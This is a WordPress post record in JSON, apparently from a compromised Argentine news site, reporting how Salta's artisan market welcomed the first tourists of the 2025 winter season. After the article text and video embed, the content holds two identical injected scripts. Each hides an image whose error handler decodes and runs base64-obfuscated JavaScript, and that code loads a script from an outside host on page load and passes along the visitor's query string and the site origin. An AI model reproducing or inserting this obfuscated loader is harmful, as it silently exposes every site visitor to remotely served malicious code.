{"id":5332,"date":"2025-07-15T09:09:55","date_gmt":"2025-07-15T12:09:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5332"},"modified":"2025-08-13T23:26:37","modified_gmt":"2025-08-14T02:26:37","slug":"el-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5332","title":{"rendered":"El Mercado Artesanal de Salta recibi\u00f3 a los primeros turistas de la temporada invernal 2025"},"content":{"rendered":"\n<p class=\"has-white-color has-text-color has-background has-link-color wp-elements-3fec4178c7de800aa7991459c40e7b9b\" style=\"background-color:#840543\"><strong><em>Un matrimonio oriundo de Pilar provincia de Buenos Aires fue recibido y agasajado por artesanos y la directora de la instituci\u00f3n.<\/em><\/strong><\/p>\n\n\n\n<p>Las Asociaciones de Artesanos del Mercado Artesanal de Salta, acompa\u00f1ados por la directora del renovado espacio, Yanina Lenti, recibieron a Enrique Bolla y Laura Acosta, los primeros turistas de la temporada invernal, oriundos de Pilar provincia de Buenos Aires.<\/p>\n\n\n\n<p>El matrimonio recorri\u00f3 los salones de venta y exposici\u00f3n de la antigua casona, donde fueron obsequiados con artesan\u00edas y gastronom\u00eda regional, finalizando con el tradicional desayuno de bienvenida.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"899\" height=\"600\" data-id=\"5334\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13155-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203708.webp\" alt=\"\" class=\"wp-image-5334\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13155-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203708.webp 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13155-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203708-300x200.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13155-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203708-768x513.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13155-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203708-629x420.webp 629w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13155-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203708-696x465.webp 696w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"899\" height=\"600\" data-id=\"5333\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13156-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203722.webp\" alt=\"\" class=\"wp-image-5333\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13156-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203722.webp 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13156-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203722-300x200.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13156-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203722-768x513.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13156-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203722-629x420.webp 629w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13156-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203722-696x465.webp 696w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"899\" height=\"600\" data-id=\"5335\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13157-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203735.webp\" alt=\"\" class=\"wp-image-5335\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13157-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203735.webp 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13157-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203735-300x200.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13157-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203735-768x513.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13157-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203735-629x420.webp 629w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/07\/13157-tituloel-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-2025-20250712203735-696x465.webp 696w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>La directora del Mercado Artesanal,&nbsp;<strong>Yanina<\/strong>&nbsp;<strong>Lenti<\/strong>, se\u00f1al\u00f3: \u201cesto es algo que venimos haciendo todos los a\u00f1os, ya es una tradici\u00f3n del Mercado hacer esta recepci\u00f3n y agasajar a los primeros turistas para hacerles conocer lo que es el Mercado y comentarles todo lo que se hace dentro de estas puertas y lo que se vende, la verdadera artesan\u00eda aut\u00e9ntica de Salta\u201d.<\/p>\n\n\n\n<p>Agreg\u00f3: \u201cEs un placer haberlos recibido a este matrimonio que visita no por primera vez Salta, pero si el Mercado; la verdad un orgullo que hayan venido tan recomendados y que la gente promocione nuestro espacio\u201d, finaliz\u00f3 Lenti.<\/p>\n\n\n\n<p>Por su parte, Enrique Bolla sostuvo: \u201cllegamos ayer a Salta y estuvimos en lo de un amigo y nos coment\u00f3 que vengamos a visitar ac\u00e1 y nos encontramos con esta sorpresa que todav\u00eda no podemos entender, la verdad estamos muy contentos\u201d.<\/p>\n\n\n\n<p>Muy emocionada, Laura Acosta manifest\u00f3: \u201chermoso, me encanta la comida, amo todo lo artesanal, me gusta, me llama mucho la atenci\u00f3n los productos que hace la gente, tiene mucho valor, sacrificio, trabajo y eso es muy valorable para todos\u201d, finaliz\u00f3: \u201cMe encanta que puedan difundir esto que es muy lindo y le sirve al artesano para seguir adelante<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El Mercado Artesanal de Salta recibi\u00f3 a los primeros turistas de la temporada invernal 2025\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/5ZRM1ZKqd34?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Un matrimonio oriundo de Pilar provincia de Buenos Aires fue recibido y agasajado por artesanos y la directora de la instituci\u00f3n. Las Asociaciones de Artesanos del Mercado Artesanal de Salta, acompa\u00f1ados por la directora del renovado espacio, Yanina Lenti, recibieron a Enrique Bolla y Laura Acosta, los primeros turistas de la temporada invernal, oriundos de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5335,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,15],"tags":[],"class_list":{"0":"post-5332","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5332"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5332"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5332\/revisions"}],"predecessor-version":[{"id":6440,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5332\/revisions\/6440"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5335"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5332"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5332"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5332"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}